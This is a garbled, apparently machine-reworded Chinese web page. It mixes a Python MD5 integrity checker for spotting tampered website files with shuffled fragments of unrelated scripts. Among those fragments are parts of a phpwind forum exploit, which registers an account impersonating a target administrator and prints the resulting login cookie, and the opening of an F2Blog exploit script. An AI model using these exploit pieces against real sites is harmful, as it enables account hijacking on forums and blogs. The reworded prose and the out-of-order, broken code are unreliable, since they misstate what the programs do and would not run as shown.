用Python和MD5实现网址挂马检查评定程序,Python常

作者: 网络编程  发布:2019-09-05

大部行使,都得以采纳二个函数搞定,举例文件下载,发送央求,解析网页,读写xml,文件减弱,爬虫寻觅。
那个应用非常多是跨平台的。能够在linux下运作。
ironpyhon是二个组合.net平台和python的工具,他们正在切磋怎样运用python把.net放在linux上运维。

# python check_change.py update /data/www #生成站点的md5值
# echo ' ' > /data/www/sitemap.html #测量检验清空文件
# rm -rf /data/www/sitemap.xml #测量检验删除文件
# python check_change.py check /data/www  #搜寻那二个文件被歪曲
/data/www/sitemap.xml
/data/www/sitemap.html

import os,string,re,sys

复制代码 代码如下:

 

file = 'file.key'
model = sys.argv[1]
path = sys.argv[2]

   else:
     sys.stdout.write("Expoilt FALSE!")
     http.close()
     #sleep(1)
     #break
     sys.stdout.write("n")

一、程序测量试验

if __name__ == '__main__': main()

# python check_change.py

def usage():
print "Usage:n"
print " $ ./phpwind.py pwforumurl usertoattackn"
print " pwforumurl 目的论坛地址如"
print " usertoattack 目标有着权力的斑竹或管理人"
print " ×××结果将会在对象论坛注册一个和目的客商一样的帐户"
print " 最新版本可以利用uid登入"
print " 别的版本能够动用cookie useragent登录"
print "########################################################"
print ""

二、完结代码如下(check_change.py)

3、数据嗅探,项目中相见,必要嗅探一些发送到特定端口的数目,于是花了几分钟写了贰个前后相继。

#!/usr/bin/env python

#!c:python24pyton
# Exploit For F2Blog All Version
# Author BY MSN:pt...@vip.sina.com
# Date: Jan 29 2007

def check(path):
    f = open(file,'r')
    for line in f:
        check_ok = """echo '%s' | md5sum -c > /dev/null 2>&1""" % line
        #print check_ok
        if not subprocess.call(check_ok, shell = True) == 0:
            abnormal = line.split()
            print abnormal[1]
    f.close()

4、这几个不是本人写的,是四个网络的×××phpwind论坛的多少个代码

def update(path):
    f = open(file,'w')
    for root,dirs,files in os.walk(path):
        for name in files:
            line = os.path.join(root, name)
            (stdin,stderr) = subprocess.Popen(['md5sum',line],stdout=subprocess.PIPE).communicate()
            f.write(stdin)
    f.close()

这一个代码,超越四分之二是从别处转来的。测量检验的时候会相比较有用。譬如数据嗅探,发送央求,正则表达式管理公事,注入测量检验等。
实则中得以依赖本身的门类,实行自然水准的扩张。代码是精简为主。这一部分代码是讲求安全测量试验的。
上学python已经2月了。认为极度有效。
前几日,pm还让本身写二个前后相继救助他办公室。

复制代码 代码如下:

def run():
    f=SevenFile()
    f.FindContent(r"E:workAPManual TestsPSIGTestProjectPSIGTestProject")
    for filepath in f.files:
        print filepath    
    print "OK"

复制代码 代码如下: # python check_change.py Usage: python check_change.py update /home/wwwroot python check_change.py check /home/wwwroot # python check_...

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type' : 'application/x-www-form-
urlencoded','User-Agent': '80sec owned this'},
data = data)
f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! "
print "Connect root#80sec.com"

    Usage: python check_change.py update /home/wwwroot
           python check_change.py check /home/wwwroot

6、×××注入×××,这是八个完完全全的access asp注入工具。
代码有一点点长,本人下载吧。

if len(sys.argv) != 3:
    Usage()

def main ():
print 'Exploit For F2Blog All Version'
print 'Codz by pt...@vip.sina.comn'
if len(sys.argv) == 2:
   url = urlparse(sys.argv[1])
   if url[2:-1] != '/':
       u = url[2] '/'
   else:
       u = url[2] #u=/bk/
else:
   print "Usage: %s <url> " % sys.argv[0]
   print "Example: %s " % sys.argv[0]
   sys.exit(0)

def Usage():
    print '''
    Usage: python %s update /home/wwwroot
           python %s check /home/wwwroot
    ''' % (sys.argv[0],sys.argv[0])
    sys.exit()

import sys
import httplib
from urlparse import urlparse
from time import sleep

import os,sys,subprocess

argvs=sys.argv
usage()

if os.path.exists(path) == False:
    print "\033[;31mThe directory or file does not exist\033[0m"
    sys.exit()
elif model == 'update':
    update(path)
elif model == 'check':
    check(path)
else:
    Usage()

data = "regname=%s
%s1®pwd=@80sec®pwdrepeat=@80sec®email=...@foo.com®emailtoall=1&step=2"
% (argvs[2],"

本文由金沙澳门官网发布于网络编程,转载请注明出处:用Python和MD5实现网址挂马检查评定程序,Python常

关键词: 金沙澳门官网

上一篇:Google自定义找出引擎
下一篇:没有了